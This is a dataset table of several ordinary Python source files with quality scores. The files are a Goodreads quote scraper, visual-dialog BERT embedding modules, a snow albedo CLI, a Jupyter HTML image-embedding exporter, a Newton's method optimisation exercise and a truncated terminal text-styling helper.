code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
from bs4 import BeautifulSoup
import requests
import re
from math import ceil
all_quotes= {}
global_countr= 1
def clean_quote(quote_uncleaned):
# remove unwanted characters
cleaned_quote1= re.sub('\n','',quote_uncleaned)
cleaned_quote2= re.sub(' +',' ',cleaned_quote1)
cleaned_quote3= re.sub(' “','',cleaned_quote2)
cleaned_quote4= re.sub('.”','',cleaned_quote3)
cleaned_quote5= cleaned_quote4.strip() # remove trailing whitespaces
return cleaned_quote5
def clean_author(author_txt):
# get author name.. present before comma by splitting
author= author_txt.split(',')
final_txt1= re.sub('\n+','',author[0])
cleaned_author= re.sub(' +',' ',final_txt1) # remove unwanted & trailing whitespaces
cleaned_author1= cleaned_author.strip()
return cleaned_author1
def clean_quote_and_author(quote_txt):
quote_with_author= []
# txt before "―" is our quote & txt after "―" is our author & other stuff
quote_author_unclean= quote_txt.split('―')
cleaned_quote= clean_quote(quote_author_unclean[0]) # format quote
cleaned_author= clean_author(quote_author_unclean[1]) # format author name
# append author & quote to list
quote_with_author.append(cleaned_quote)
quote_with_author.append(cleaned_author)
return quote_with_author
def makeSoup(url):
resp_by_category= requests.get(url)
htmlContent= resp_by_category.content
soup= BeautifulSoup(htmlContent,'html.parser')
return soup
def get_cloud_quotes_quantity(category):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page=1&utf8=%E2%9C%93')
res= soup.find('span' ,class_='smallText')
results= res.text
if results:
tmp_str_val= ''
final_extracted_val= int()
for indx in range(len(results)-1,8,-1):
if results[indx]== ' ':
break
if results[indx]== ',':
continue
tmp_str_val+= results[indx]
final_extracted_val= int(tmp_str_val)
return final_extracted_val,soup
else:
return 0,soup
def scrap_single_page_data(soup,quantity,total_quotes_to_scrap):
countr= 1
all_quotes_div= soup.findAll('div',class_='quoteText')
for quote_div in all_quotes_div:
quote_txt= quote_div.text
quot_and_author= clean_quote_and_author(quote_txt)
quote= quot_and_author[0]
author= quot_and_author[1]
all_quotes[quote]= author
if countr == quantity:
break
countr += 1
process_unformatted= (len(all_quotes)/total_quotes_to_scrap)*100
process_round_off= round(process_unformatted,2)
print(f"Processing....{process_round_off}%")
def scrap_multi_page_data(no_of_pages, category, quantity):
global all_quotes
while len(all_quotes) < quantity:
for page_no in range(1, no_of_pages+1):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page={page_no}&utf8=%E2%9C%93')
if page_no != no_of_pages:
scrap_single_page_data(soup,30,quantity)
else:
last_page_quantity= quantity % 30
scrap_single_page_data(soup,last_page_quantity,quantity)
def get_quotes(category,quantity):
if quantity< 1:
print('please enter a greater number than 0')
return
cloud_quotes_quantity,soup= get_cloud_quotes_quantity(category)
if cloud_quotes_quantity <=0:
print(f"Sorry! we can't find any data for that Query. \nPlease Enter proper category like 'life', 'water',etc.,")
elif cloud_quotes_quantity< quantity:
print(f"Sorry, we can't find that much quantity of results\nwe only have {cloud_quotes_quantity} results.")
else:
if quantity <= 30:
scrap_single_page_data(soup,quantity,quantity)
elif quantity > 30:
res= quantity
no_of_pages= ceil(res / 30)
scrap_multi_page_data(no_of_pages, category, quantity)
def scrap_quotes(category,quantity):
get_quotes(category,quantity)
if get_quotes:
return all_quotes
else:
print('No Quote Found') | scrapper/web_scrapper.py | from bs4 import BeautifulSoup
import requests
import re
from math import ceil
all_quotes= {}
global_countr= 1
def clean_quote(quote_uncleaned):
# remove unwanted characters
cleaned_quote1= re.sub('\n','',quote_uncleaned)
cleaned_quote2= re.sub(' +',' ',cleaned_quote1)
cleaned_quote3= re.sub(' “','',cleaned_quote2)
cleaned_quote4= re.sub('.”','',cleaned_quote3)
cleaned_quote5= cleaned_quote4.strip() # remove trailing whitespaces
return cleaned_quote5
def clean_author(author_txt):
# get author name.. present before comma by splitting
author= author_txt.split(',')
final_txt1= re.sub('\n+','',author[0])
cleaned_author= re.sub(' +',' ',final_txt1) # remove unwanted & trailing whitespaces
cleaned_author1= cleaned_author.strip()
return cleaned_author1
def clean_quote_and_author(quote_txt):
quote_with_author= []
# txt before "―" is our quote & txt after "―" is our author & other stuff
quote_author_unclean= quote_txt.split('―')
cleaned_quote= clean_quote(quote_author_unclean[0]) # format quote
cleaned_author= clean_author(quote_author_unclean[1]) # format author name
# append author & quote to list
quote_with_author.append(cleaned_quote)
quote_with_author.append(cleaned_author)
return quote_with_author
def makeSoup(url):
resp_by_category= requests.get(url)
htmlContent= resp_by_category.content
soup= BeautifulSoup(htmlContent,'html.parser')
return soup
def get_cloud_quotes_quantity(category):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page=1&utf8=%E2%9C%93')
res= soup.find('span' ,class_='smallText')
results= res.text
if results:
tmp_str_val= ''
final_extracted_val= int()
for indx in range(len(results)-1,8,-1):
if results[indx]== ' ':
break
if results[indx]== ',':
continue
tmp_str_val+= results[indx]
final_extracted_val= int(tmp_str_val)
return final_extracted_val,soup
else:
return 0,soup
def scrap_single_page_data(soup,quantity,total_quotes_to_scrap):
countr= 1
all_quotes_div= soup.findAll('div',class_='quoteText')
for quote_div in all_quotes_div:
quote_txt= quote_div.text
quot_and_author= clean_quote_and_author(quote_txt)
quote= quot_and_author[0]
author= quot_and_author[1]
all_quotes[quote]= author
if countr == quantity:
break
countr += 1
process_unformatted= (len(all_quotes)/total_quotes_to_scrap)*100
process_round_off= round(process_unformatted,2)
print(f"Processing....{process_round_off}%")
def scrap_multi_page_data(no_of_pages, category, quantity):
global all_quotes
while len(all_quotes) < quantity:
for page_no in range(1, no_of_pages+1):
soup= makeSoup(f'https://www.goodreads.com/quotes/tag/{category}?page={page_no}&utf8=%E2%9C%93')
if page_no != no_of_pages:
scrap_single_page_data(soup,30,quantity)
else:
last_page_quantity= quantity % 30
scrap_single_page_data(soup,last_page_quantity,quantity)
def get_quotes(category,quantity):
if quantity< 1:
print('please enter a greater number than 0')
return
cloud_quotes_quantity,soup= get_cloud_quotes_quantity(category)
if cloud_quotes_quantity <=0:
print(f"Sorry! we can't find any data for that Query. \nPlease Enter proper category like 'life', 'water',etc.,")
elif cloud_quotes_quantity< quantity:
print(f"Sorry, we can't find that much quantity of results\nwe only have {cloud_quotes_quantity} results.")
else:
if quantity <= 30:
scrap_single_page_data(soup,quantity,quantity)
elif quantity > 30:
res= quantity
no_of_pages= ceil(res / 30)
scrap_multi_page_data(no_of_pages, category, quantity)
def scrap_quotes(category,quantity):
get_quotes(category,quantity)
if get_quotes:
return all_quotes
else:
print('No Quote Found') | 0.136637 | 0.095687 |
from ..builder import EMBEDDING
from torch import nn
import torch
import math
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
"""Construct a layernorm module in the TF style (epsilon inside the
square root)."""
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
@EMBEDDING.register_module()
class VisDiaBertEmbeddingsDialog(nn.Module):
def __init__(self, config):
super(VisDiaBertEmbeddingsDialog, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
max_seq_len = 256
d_model = config.hidden_size
pe = torch.zeros(max_seq_len, d_model)
for pos in range(max_seq_len):
for i in range(0, d_model, 2):
pe[pos, i] = \
math.sin(pos / (10000 ** ((2 * i) / d_model)))
pe[pos, i + 1] = \
math.cos(pos / (10000 ** ((2 * (i + 1)) / d_model)))
self.pe = pe.cuda()
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# add support for additional segment embeddings. Supporting 10 additional embedding as of now
self.token_type_embeddings_extension = nn.Embedding(10, config.hidden_size)
# adding specialized embeddings for sep tokens
self.sep_embeddings = nn.Embedding(50, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.config = config
def forward(self, input_ids, sep_indices=None, sep_len=None, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_ids_extension = token_type_ids - self.config.type_vocab_size
token_type_ids_extension_mask = (token_type_ids_extension >= 0).float()
token_type_ids_extension = (token_type_ids_extension.float() * token_type_ids_extension_mask).long()
token_type_ids_mask = (token_type_ids < self.config.type_vocab_size).float()
assert torch.sum(token_type_ids_extension_mask + token_type_ids_mask) == \
torch.numel(token_type_ids) == torch.numel(token_type_ids_mask)
token_type_ids = (token_type_ids.float() * token_type_ids_mask).long()
token_type_embeddings = self.token_type_embeddings(token_type_ids)
token_type_embeddings_extension = self.token_type_embeddings_extension(token_type_ids_extension)
token_type_embeddings = (token_type_embeddings * token_type_ids_mask.unsqueeze(-1)) + \
(token_type_embeddings_extension * token_type_ids_extension_mask.unsqueeze(-1))
embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
@EMBEDDING.register_module()
class VisDiaBertImageEmbeddings(nn.Module):
"""Construct the embeddings from image, spatial location (omit now) and
token_type embeddings."""
def __init__(self, config):
super(VisDiaBertImageEmbeddings, self).__init__()
self.image_embeddings = nn.Linear(config.v_feature_size, config.v_hidden_size)
self.image_location_embeddings = nn.Linear(5, config.v_hidden_size)
self.LayerNorm = BertLayerNorm(config.v_hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, input_ids, input_loc):
img_embeddings = self.image_embeddings(input_ids)
loc_embeddings = self.image_location_embeddings(input_loc)
embeddings = self.LayerNorm(img_embeddings + loc_embeddings)
embeddings = self.dropout(embeddings)
return embeddings | imix/models/embedding/visual_dialog_embedding.py | from ..builder import EMBEDDING
from torch import nn
import torch
import math
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
"""Construct a layernorm module in the TF style (epsilon inside the
square root)."""
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
@EMBEDDING.register_module()
class VisDiaBertEmbeddingsDialog(nn.Module):
def __init__(self, config):
super(VisDiaBertEmbeddingsDialog, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
max_seq_len = 256
d_model = config.hidden_size
pe = torch.zeros(max_seq_len, d_model)
for pos in range(max_seq_len):
for i in range(0, d_model, 2):
pe[pos, i] = \
math.sin(pos / (10000 ** ((2 * i) / d_model)))
pe[pos, i + 1] = \
math.cos(pos / (10000 ** ((2 * (i + 1)) / d_model)))
self.pe = pe.cuda()
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# add support for additional segment embeddings. Supporting 10 additional embedding as of now
self.token_type_embeddings_extension = nn.Embedding(10, config.hidden_size)
# adding specialized embeddings for sep tokens
self.sep_embeddings = nn.Embedding(50, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.config = config
def forward(self, input_ids, sep_indices=None, sep_len=None, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_ids_extension = token_type_ids - self.config.type_vocab_size
token_type_ids_extension_mask = (token_type_ids_extension >= 0).float()
token_type_ids_extension = (token_type_ids_extension.float() * token_type_ids_extension_mask).long()
token_type_ids_mask = (token_type_ids < self.config.type_vocab_size).float()
assert torch.sum(token_type_ids_extension_mask + token_type_ids_mask) == \
torch.numel(token_type_ids) == torch.numel(token_type_ids_mask)
token_type_ids = (token_type_ids.float() * token_type_ids_mask).long()
token_type_embeddings = self.token_type_embeddings(token_type_ids)
token_type_embeddings_extension = self.token_type_embeddings_extension(token_type_ids_extension)
token_type_embeddings = (token_type_embeddings * token_type_ids_mask.unsqueeze(-1)) + \
(token_type_embeddings_extension * token_type_ids_extension_mask.unsqueeze(-1))
embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
@EMBEDDING.register_module()
class VisDiaBertImageEmbeddings(nn.Module):
"""Construct the embeddings from image, spatial location (omit now) and
token_type embeddings."""
def __init__(self, config):
super(VisDiaBertImageEmbeddings, self).__init__()
self.image_embeddings = nn.Linear(config.v_feature_size, config.v_hidden_size)
self.image_location_embeddings = nn.Linear(5, config.v_hidden_size)
self.LayerNorm = BertLayerNorm(config.v_hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, input_ids, input_loc):
img_embeddings = self.image_embeddings(input_ids)
loc_embeddings = self.image_location_embeddings(input_loc)
embeddings = self.LayerNorm(img_embeddings + loc_embeddings)
embeddings = self.dropout(embeddings)
return embeddings | 0.962365 | 0.420302 |
import click
from .measurement_composite import MeasurementComposite
from .plotter import Plotter
@click.command(
help='Calculate snow albedo from a sequence of up and down looking '
'measurements with the ASD field spectrometer.'
)
@click.option(
'-in', '--input-dir',
prompt=True, type=click.Path(exists=True),
help='Path to input directory containing both up and down looking '
'measurements',
)
@click.option(
'-fp', '--file-prefix',
prompt=True,
help='Prefix of the filename for an individual measurement.'
)
@click.option(
'-ofs', '--output-file-suffix',
default='albedo',
help='Suffix to use for the saved file. Default: albedo'
)
@click.option(
'--up-looking-file-start', '-up', 'up_index',
prompt=True, type=int,
help='Start index of the file containing the first up looking measurement.'
)
@click.option(
'--up-looking-count', '-ulc', 'up_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--down-looking-file-start', '-down', 'down_index',
prompt=True, type=int,
help='Start index of the file containing the first down looking '
'measurement.',
)
@click.option(
'--down-looking-count', '-dlc', 'down_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--skip-plot',
is_flag=True, default=False,
help="Don't show plot of the result",
)
@click.option(
'--debug',
is_flag=True, default=False,
help='Print information of processed files while processing',
)
def cli(
input_dir,
file_prefix, output_file_suffix,
up_index, up_count,
down_index, down_count,
skip_plot, debug
):
try:
composite = MeasurementComposite(
input_dir, file_prefix, down_index, up_index,
set_1_count=down_count, set_2_count=up_count,
debug=debug
)
composite.calculate()
print(f"Results saved to:\n {composite.save(output_file_suffix)}")
if composite.set_2.mean() < composite.set_1.mean():
set_1_label = 'Incoming'
set_2_label = 'Outgoing'
else:
set_1_label = 'Outgoing'
set_2_label = 'Incoming'
if not skip_plot:
Plotter.show_composite(
composite,
composite_title='Albedo',
set_1_label=set_1_label,
set_2_label=set_2_label
)
except FileNotFoundError as fnfe:
print(f"ERROR: {fnfe}") | src/spectro_dp/asd/albedo.py | import click
from .measurement_composite import MeasurementComposite
from .plotter import Plotter
@click.command(
help='Calculate snow albedo from a sequence of up and down looking '
'measurements with the ASD field spectrometer.'
)
@click.option(
'-in', '--input-dir',
prompt=True, type=click.Path(exists=True),
help='Path to input directory containing both up and down looking '
'measurements',
)
@click.option(
'-fp', '--file-prefix',
prompt=True,
help='Prefix of the filename for an individual measurement.'
)
@click.option(
'-ofs', '--output-file-suffix',
default='albedo',
help='Suffix to use for the saved file. Default: albedo'
)
@click.option(
'--up-looking-file-start', '-up', 'up_index',
prompt=True, type=int,
help='Start index of the file containing the first up looking measurement.'
)
@click.option(
'--up-looking-count', '-ulc', 'up_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--down-looking-file-start', '-down', 'down_index',
prompt=True, type=int,
help='Start index of the file containing the first down looking '
'measurement.',
)
@click.option(
'--down-looking-count', '-dlc', 'down_count',
default=10, type=int,
help='Total count of up looking measurements. (Default: 10)'
)
@click.option(
'--skip-plot',
is_flag=True, default=False,
help="Don't show plot of the result",
)
@click.option(
'--debug',
is_flag=True, default=False,
help='Print information of processed files while processing',
)
def cli(
input_dir,
file_prefix, output_file_suffix,
up_index, up_count,
down_index, down_count,
skip_plot, debug
):
try:
composite = MeasurementComposite(
input_dir, file_prefix, down_index, up_index,
set_1_count=down_count, set_2_count=up_count,
debug=debug
)
composite.calculate()
print(f"Results saved to:\n {composite.save(output_file_suffix)}")
if composite.set_2.mean() < composite.set_1.mean():
set_1_label = 'Incoming'
set_2_label = 'Outgoing'
else:
set_1_label = 'Outgoing'
set_2_label = 'Incoming'
if not skip_plot:
Plotter.show_composite(
composite,
composite_title='Albedo',
set_1_label=set_1_label,
set_2_label=set_2_label
)
except FileNotFoundError as fnfe:
print(f"ERROR: {fnfe}") | 0.370225 | 0.196614 |
import base64
import re
from nbconvert.exporters.html import HTMLExporter
from ipython_genutils.ipstruct import Struct
import os
try:
from urllib.request import urlopen # py3
except ImportError:
from urllib2 import urlopen
class EmbedHTMLExporter(HTMLExporter):
"""
:mod:`nbconvert` Exporter which embeds graphics as base64 into html.
Convert to HTML and embed graphics (pdf, svg and raster images) in the HTML
file.
Example usage::
jupyter nbconvert --to html_embed mynotebook.ipynb
"""
def replfunc(self, match):
"""Replace source url or file link with base64 encoded blob."""
url = match.group(1)
imgformat = url.split('.')[-1]
if url.startswith('http'):
data = urlopen(url).read()
elif url.startswith('data'):
img = '<img src="' + url + '"'
return img
elif url.startswith('attachment'):
imgname = url.split(':')[1]
available_formats = self.attachments[imgname]
# get the image based on the configured image type priority
for imgformat in self.config.NbConvertBase.display_data_priority:
if imgformat in available_formats.keys():
b64_data = self.attachments[imgname][imgformat]
img = '<img src="data:' + imgformat + \
';base64,' + b64_data + '"'
return img
raise ValueError('Could not find attachment for image "%s" in notebook' % imgname)
else:
filename = os.path.join(self.path, url)
with open(filename, 'rb') as f:
data = f.read()
self.log.info("embedding url: %s, format: %s" % (url, imgformat))
b64_data = base64.b64encode(data).decode("utf-8")
if imgformat == "svg":
img = '<img src="data:image/svg+xml;base64,' + \
b64_data + '"'
elif imgformat == "pdf":
img = '<img src="data:application/pdf;base64,' + \
b64_data + '"'
else:
img = '<img src="data:image/' + imgformat + \
';base64,' + b64_data + '"'
return img
def from_notebook_node(self, nb, resources=None, **kw):
output, resources = super(
EmbedHTMLExporter, self).from_notebook_node(nb, resources)
self.path = resources['metadata']['path']
self.attachments = Struct()
for cell in nb.cells:
if 'attachments' in cell.keys():
self.attachments += cell['attachments']
regex = re.compile('<img\s+src="([^"]+)"')
embedded_output = regex.sub(self.replfunc, output)
return embedded_output, resources | jupyter_contrib_nbextensions/nbconvert_support/embedhtml.py |
import base64
import re
from nbconvert.exporters.html import HTMLExporter
from ipython_genutils.ipstruct import Struct
import os
try:
from urllib.request import urlopen # py3
except ImportError:
from urllib2 import urlopen
class EmbedHTMLExporter(HTMLExporter):
"""
:mod:`nbconvert` Exporter which embeds graphics as base64 into html.
Convert to HTML and embed graphics (pdf, svg and raster images) in the HTML
file.
Example usage::
jupyter nbconvert --to html_embed mynotebook.ipynb
"""
def replfunc(self, match):
"""Replace source url or file link with base64 encoded blob."""
url = match.group(1)
imgformat = url.split('.')[-1]
if url.startswith('http'):
data = urlopen(url).read()
elif url.startswith('data'):
img = '<img src="' + url + '"'
return img
elif url.startswith('attachment'):
imgname = url.split(':')[1]
available_formats = self.attachments[imgname]
# get the image based on the configured image type priority
for imgformat in self.config.NbConvertBase.display_data_priority:
if imgformat in available_formats.keys():
b64_data = self.attachments[imgname][imgformat]
img = '<img src="data:' + imgformat + \
';base64,' + b64_data + '"'
return img
raise ValueError('Could not find attachment for image "%s" in notebook' % imgname)
else:
filename = os.path.join(self.path, url)
with open(filename, 'rb') as f:
data = f.read()
self.log.info("embedding url: %s, format: %s" % (url, imgformat))
b64_data = base64.b64encode(data).decode("utf-8")
if imgformat == "svg":
img = '<img src="data:image/svg+xml;base64,' + \
b64_data + '"'
elif imgformat == "pdf":
img = '<img src="data:application/pdf;base64,' + \
b64_data + '"'
else:
img = '<img src="data:image/' + imgformat + \
';base64,' + b64_data + '"'
return img
def from_notebook_node(self, nb, resources=None, **kw):
output, resources = super(
EmbedHTMLExporter, self).from_notebook_node(nb, resources)
self.path = resources['metadata']['path']
self.attachments = Struct()
for cell in nb.cells:
if 'attachments' in cell.keys():
self.attachments += cell['attachments']
regex = re.compile('<img\s+src="([^"]+)"')
embedded_output = regex.sub(self.replfunc, output)
return embedded_output, resources | 0.591133 | 0.200577 |
# Práctica 1, <NAME>
# <NAME>
# Método de Newton para minimizar funciones
import numpy as np
import sympy as sp
import matplotlib.pyplot as plt
x, y = sp.symbols('x y')
# Función a minimizar
f_sym=sp.Lambda((x,y), sp.simplify((x-2)**2+2*(y+2)**2+2*sp.sin(2*sp.pi*x)*sp.sin(2*sp.pi*y)))
def f(w):
return float(f_sym(w[0],w[1]))
# Derivada parcial de f respecto de x
fx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),x)))
def fx(w):
return float(fx_sym(w[0],w[1]))
# Derivada parcial de f respecto de y
fy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),y)))
def fy(w):
return float(fy_sym(w[0],w[1]))
# Gradiente de f
def gradf(w):
return np.array((fx(w), fy(w)),np.float64)
# Derivadas parciales de segundo orden:
fxx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),x)))
def fxx(w):
return float(fxx_sym(w[0],w[1]))
fxy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),y)))
def fxy(w):
return float(fxy_sym(w[0],w[1]))
fyy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fy_sym(x,y),y)))
def fyy(w):
return float(fyy_sym(w[0],w[1]))
# <NAME>
def hessf(w):
a=fxy(w) # f es de clase 2, así que fxy = fyx
return np.array([[fxx(w),a],[a,fyy(w)]])
# Método de Newton para encontrar un 0 en la derivada
def newton(w, grad_fun, hess_fun, fun, max_iters=500):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
H1=np.linalg.inv(hess_fun(w))
w = w - np.dot(H1,grad_fun(w))
graf.append(fun(w))
return w, graf
# Gradiente descendiente (para compararlo)
def gd(w, lr, grad_fun, fun, max_iters = 1000):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
grad=grad_fun(w)
w=w-lr*grad
graf.append(fun(w))
#print(w, fun(w))
graf = np.array(graf,np.float64)
return w, graf
print('Comparación del método de Newton con el gradiente descendente:\n')
# Número de iteraciones
max_iters=20
# Tasa de aprendizaje para el gradiente descendente
lr=0.01
# Puntos de inicio
condiciones_iniciales=np.array([(2.1, -2.1),(3.0, -3.0),(1.5, 1.5),(1.0, -1.0)])
# Experimentos con resultados (no he puesto pausas porque se pausa sólo hasta que se cierre la gráfica que genera, se puede descomentar la pausa)
for w in condiciones_iniciales:
wn, grafn = newton(w, gradf, hessf, f, max_iters)
wg, grafg = gd(w, lr, gradf, f, max_iters)
# Resultados obtenidos
print('Punto de inicio:', w)
print('Solución y valor del método de Newton:')
print ('(x,y) = (', wn[0], ', ', wn[1],')')
print ('f(x,y) = ',f(wn))
print('Solución y valor del gradiente estocástico:')
print ('(x,y) = (', wg[0], ', ', wg[1],')')
print ('f(x,y) = ',f(wg))
print()
#input("\n--- Pulsar tecla para continuar ---\n")
# Curva de decrecimiento de la función
plt.plot(range(0,max_iters+1), grafn, 'bo', alpha=0.6, label='Newton')
plt.plot(range(0,max_iters+1), grafg, 'ro', alpha=0.4, label='Grad. Desc.')
plt.xlabel('Iteraciones')
plt.ylabel('f(x,y)')
plt.title('Punto de inicio: w = '+str(w))
plt.legend()
plt.show()
input("\n--- Pulsar tecla para salir ---\n") | practica1/bonus.py |
# Práctica 1, <NAME>
# <NAME>
# Método de Newton para minimizar funciones
import numpy as np
import sympy as sp
import matplotlib.pyplot as plt
x, y = sp.symbols('x y')
# Función a minimizar
f_sym=sp.Lambda((x,y), sp.simplify((x-2)**2+2*(y+2)**2+2*sp.sin(2*sp.pi*x)*sp.sin(2*sp.pi*y)))
def f(w):
return float(f_sym(w[0],w[1]))
# Derivada parcial de f respecto de x
fx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),x)))
def fx(w):
return float(fx_sym(w[0],w[1]))
# Derivada parcial de f respecto de y
fy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(f_sym(x,y),y)))
def fy(w):
return float(fy_sym(w[0],w[1]))
# Gradiente de f
def gradf(w):
return np.array((fx(w), fy(w)),np.float64)
# Derivadas parciales de segundo orden:
fxx_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),x)))
def fxx(w):
return float(fxx_sym(w[0],w[1]))
fxy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fx_sym(x,y),y)))
def fxy(w):
return float(fxy_sym(w[0],w[1]))
fyy_sym=sp.Lambda((x,y), sp.simplify(sp.diff(fy_sym(x,y),y)))
def fyy(w):
return float(fyy_sym(w[0],w[1]))
# <NAME>
def hessf(w):
a=fxy(w) # f es de clase 2, así que fxy = fyx
return np.array([[fxx(w),a],[a,fyy(w)]])
# Método de Newton para encontrar un 0 en la derivada
def newton(w, grad_fun, hess_fun, fun, max_iters=500):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
H1=np.linalg.inv(hess_fun(w))
w = w - np.dot(H1,grad_fun(w))
graf.append(fun(w))
return w, graf
# Gradiente descendiente (para compararlo)
def gd(w, lr, grad_fun, fun, max_iters = 1000):
graf = []
graf.append(fun(w))
for _ in range(max_iters):
grad=grad_fun(w)
w=w-lr*grad
graf.append(fun(w))
#print(w, fun(w))
graf = np.array(graf,np.float64)
return w, graf
print('Comparación del método de Newton con el gradiente descendente:\n')
# Número de iteraciones
max_iters=20
# Tasa de aprendizaje para el gradiente descendente
lr=0.01
# Puntos de inicio
condiciones_iniciales=np.array([(2.1, -2.1),(3.0, -3.0),(1.5, 1.5),(1.0, -1.0)])
# Experimentos con resultados (no he puesto pausas porque se pausa sólo hasta que se cierre la gráfica que genera, se puede descomentar la pausa)
for w in condiciones_iniciales:
wn, grafn = newton(w, gradf, hessf, f, max_iters)
wg, grafg = gd(w, lr, gradf, f, max_iters)
# Resultados obtenidos
print('Punto de inicio:', w)
print('Solución y valor del método de Newton:')
print ('(x,y) = (', wn[0], ', ', wn[1],')')
print ('f(x,y) = ',f(wn))
print('Solución y valor del gradiente estocástico:')
print ('(x,y) = (', wg[0], ', ', wg[1],')')
print ('f(x,y) = ',f(wg))
print()
#input("\n--- Pulsar tecla para continuar ---\n")
# Curva de decrecimiento de la función
plt.plot(range(0,max_iters+1), grafn, 'bo', alpha=0.6, label='Newton')
plt.plot(range(0,max_iters+1), grafg, 'ro', alpha=0.4, label='Grad. Desc.')
plt.xlabel('Iteraciones')
plt.ylabel('f(x,y)')
plt.title('Punto de inicio: w = '+str(w))
plt.legend()
plt.show()
input("\n--- Pulsar tecla para salir ---\n") | 0.334589 | 0.588357 |
import sys
_style_dict = {
"reset": "\033[0m",
"bold": "\033[01m",
"disable": '\033[02m',
"underline": '\033[04m',
"reverse": '\033[07m',
"strikethrough": '\033[09m',
"invisible": '\033[08m'
}
_fg_dict = {
"black": "\033[30m",
"red": "\033[31m",
"green": "\033[32m",
"orange": "\033[33m",
"blue": "\033[34m",
"purple": "\033[35m",
"cyan": "\033[36m",
"lightgrey": "\033[37m",
"darkgrey": "\033[90m",
"lightred": "\033[91m",
"lightgreen": "\033[92m",
"yellow": "\033[93m",
"lightblue": "\033[94m",
"pink": "\033[95m",
"lightcyan": "\033[96m"
}
_bg_dict = {
"black": "\033[40m",
"red": "\033[41m",
"green": "\033[42m",
"orange": "\033[43m",
"blue": "\033[44m",
"purple": "\033[45m",
"cyan": "\033[46m",
"lightgrey": "\033[47m"
}
def _names2ascii(fg=None, stylename=None, bg=None) -> str:
"""Convert names of foreground, styles and background to ASCII symbols string"""
fg_string = _fg_dict[fg] if fg is not None else ""
bg_string = _bg_dict[bg] if bg is not None else ""
st_string = ""
if stylename is not None:
style_list = stylename.split(" ")
for style_item in style_list:
st_string = "".join((st_string, _style_dict[style_item]))
st_bg_fg_str = "".join((
st_string,
fg_string,
bg_string))
return st_bg_fg_str
def style_string(string: str, fg=None, stylename=None, bg=None) -> str:
"""Apply styles to text.
It is able to change style (like bold, underline etc), foreground and background colors of text string."""
ascii_str = _names2ascii(fg, stylename, bg)
return "".join((
ascii_str,
string,
_style_dict["reset"]))
def style_func_stream(stream=sys.stdout, fg=None, stylename=None, bg=None):
"""Apply styles to stream and call the .
It is able to change style (like bold, underline etc), foreground and background colors of text string.
Example usage:
style_stream(_stream, fg=fg, stylename=stylename,bg=bg)\
